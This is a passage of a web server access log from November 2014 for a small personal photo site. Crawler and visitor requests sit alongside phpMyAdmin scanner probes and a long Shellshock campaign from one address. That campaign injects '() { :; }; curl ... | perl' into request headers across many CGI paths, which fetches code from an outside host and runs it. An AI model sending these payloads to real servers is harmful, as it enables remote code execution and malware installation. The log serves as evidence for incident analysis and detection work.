"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.178 - - [01/Nov/2014:09:09:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +37.219.143.80 - - [01/Nov/2014:09:13:49 +0200] "GET /ftp/public/pictures/nightsky_02082014.jpg HTTP/1.1" 200 841278 "-" "Dalvik/1.6.0 (Linux; U; Android 4.3; GT-I9305 Build/JSS15J)" +37.219.143.80 - - [01/Nov/2014:09:13:50 +0200] "GET /ftp/public/pictures/nightsky_02082014.jpg HTTP/1.1" 200 841277 "-" "Dalvik/1.6.0 (Linux; U; Android 4.3; GT-I9305 Build/JSS15J)" +200.160.122.180 - - [01/Nov/2014:09:33:07 +0200] "GET /ojoj/ojo/oj.php HTTP/1.1" 404 416 "-" "-" +200.160.122.180 - - [01/Nov/2014:09:33:08 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 429 "-" "-" +200.160.122.180 - - [01/Nov/2014:09:33:08 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 422 "-" "-" +200.160.122.180 - - [01/Nov/2014:09:33:09 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 426 "-" "-" +123.125.71.103 - - [01/Nov/2014:10:12:16 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.158 - - [01/Nov/2014:10:13:15 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.95 - - [01/Nov/2014:11:06:05 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.154 - - [01/Nov/2014:11:06:10 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +178.239.62.104 - - [01/Nov/2014:12:10:15 +0200] "GET /muieblackcat HTTP/1.1" 404 411 "-" "-" +178.239.62.104 - - [01/Nov/2014:12:10:15 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 421 "-" "-" +178.239.62.104 - - [01/Nov/2014:12:10:15 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 403 424 "-" "-" +178.239.62.104 - - [01/Nov/2014:12:10:16 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 415 "-" "-" +178.239.62.104 - - [01/Nov/2014:12:10:16 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 419 "-" "-" +178.239.62.104 - - [01/Nov/2014:12:10:16 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 419 "-" "-" +123.125.71.112 - - [01/Nov/2014:12:19:46 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +188.165.15.236 - - [01/Nov/2014:14:46:00 +0200] "GET /ftp/public/pictures/spherical_panoramas/lauttasaari01.html HTTP/1.1" 200 1113 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)" +220.181.108.159 - - [01/Nov/2014:15:12:48 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.111 - - [01/Nov/2014:15:13:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +80.248.116.63 - - [01/Nov/2014:15:45:40 +0200] "GET /ftp/public/pictures/gallery/IMG_1470.jpg HTTP/1.1" 200 1068230 "https://www.google.fi/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" +123.125.71.111 - - [01/Nov/2014:16:13:22 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [01/Nov/2014:17:09:09 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.76 - - [01/Nov/2014:17:13:24 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +84.251.134.71 - - [01/Nov/2014:17:30:27 +0200] "GET /ftp/public/pictures/gallery/cloudymoon_rdct.jpg HTTP/1.1" 200 998391 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" +220.181.108.156 - - [01/Nov/2014:18:07:25 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.73 - - [01/Nov/2014:18:08:17 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.95 - - [01/Nov/2014:19:42:56 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.181 - - [01/Nov/2014:19:43:30 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.172.64.17 - - [01/Nov/2014:20:02:51 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:02:52 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:02:52 +0200] "GET / HTTP/1.0" 200 490 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:54 +0200] "GET /cgi-sys/ HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:54 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:54 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:55 +0200] "GET /cgi-sys/suspendedpage.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:55 +0200] "GET /xul/ HTTP/1.0" 404 442 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:52 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:56 +0200] "GET /cgi-bin/status HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:56 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:57 +0200] "GET /gitweb/ HTTP/1.0" 404 445 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:57 +0200] "GET /gitweb.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:57 +0200] "GET /gitweb/gitweb.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:58 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:58 +0200] "GET /cgi-bin/php HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:59 +0200] "GET /cgi-bin/php5 HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:59 +0200] "GET /cgi-bin/php4 HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:02:59 +0200] "GET /cgi-bin/php-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:00 +0200] "GET /cgi-bin/php.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:00 +0200] "GET /cgi-bin/firmwarecfg HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:01 +0200] "GET /cgi-bin/%2f/admin.html HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:01 +0200] "GET /cgi-bin/admin.html HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:01 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:02 +0200] "GET /sys-cgi HTTP/1.0" 404 445 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:02 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 474 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:03 +0200] "GET /cgi-bin/tree.php HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:03 +0200] "GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:03 +0200] "GET /cgi-bin/hello HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:04 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:04 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:05 +0200] "GET /cgi-bin/status/status.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:05 +0200] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 459 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:06 +0200] "GET /wwwboard.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:06 +0200] "GET /wwwadmin.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:06 +0200] "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:07 +0200] "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:07 +0200] "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:09 +0200] "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:09 +0200] "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0" 404 467 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:09 +0200] "GET /Web_Store/web_store.cgi HTTP/1.0" 404 461 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:10 +0200] "GET /users/scripts/submit.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:10 +0200] "GET /userreg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:11 +0200] "GET /upload.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:11 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:11 +0200] "GET /test.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:12 +0200] "GET /template.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:12 +0200] "GET /technote/print.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:13 +0200] "GET /submit.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:13 +0200] "GET /siteUserMod.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:13 +0200] "GET /site_searcher.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:14 +0200] "GET /shop/normal_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:14 +0200] "GET /shop/member_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:15 +0200] "GET /SetSecurity.shmHTTP/1.0" 404 221 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:15 +0200] "GET /setpasswd.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:16 +0200] "GET /scancfg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:18 +0200] "GET /sample04.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:18 +0200] "GET /sample03.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:19 +0200] "GET /sample02.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:19 +0200] "GET /sample01.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:20 +0200] "GET /ROADS/cgi-bin/search.plHTTP/1.0" 404 229 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:20 +0200] "GET /reviews/newpro.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:20 +0200] "GET /redirects/redir.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:21 +0200] "GET /quikstore.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:21 +0200] "GET /quikmail/nph-emumail.cgi HTTP/1.0" 404 462 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:22 +0200] "GET /pub/english.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:22 +0200] "GET /process_bug.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:22 +0200] "GET /print.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:23 +0200] "GET /photodata/manage.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:23 +0200] "GET /photo/manage.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:24 +0200] "GET /parse_xml.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:24 +0200] "GET /page.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:24 +0200] "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0" 404 469 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:25 +0200] "GET /newsletter.shHTTP/1.0" 404 219 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:25 +0200] "GET /newpro.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:26 +0200] "GET /ncbook.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:26 +0200] "GET /musicqueue.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:28 +0200] "GET /ministats/admin.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:28 +0200] "GET /megabook/admin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:28 +0200] "GET /main.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:29 +0200] "GET /mailview.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:29 +0200] "GET /login.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:30 +0200] "GET /left.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:30 +0200] "GET /infosrch.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:30 +0200] "GET /info.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:31 +0200] "GET /index.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:31 +0200] "GET /html/cgi-bin/cgicsoHTTP/1.0" 404 225 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:32 +0200] "GET /hndUnblock.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:32 +0200] "GET /hitmatic/analyse.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:32 +0200] "GET /Gozila.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:33 +0200] "GET /fcgi-bin/echo2HTTP/1.0" 404 220 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:33 +0200] "GET /fcgi-bin/echoHTTP/1.0" 404 219 "-" "-" +66.172.64.17 - - [01/Nov/2014:20:03:34 +0200] "GET /ez2000/ezman.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:34 +0200] "GET /ez2000/ezboard.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:34 +0200] "GET /ez2000/ezadmin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:35 +0200] "GET /enter_bug.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:35 +0200] "GET /emumail.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" +66.172.64.17 - - [01/Nov/2014:20:03:36 +0200] "GET /edittag/edittag.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | 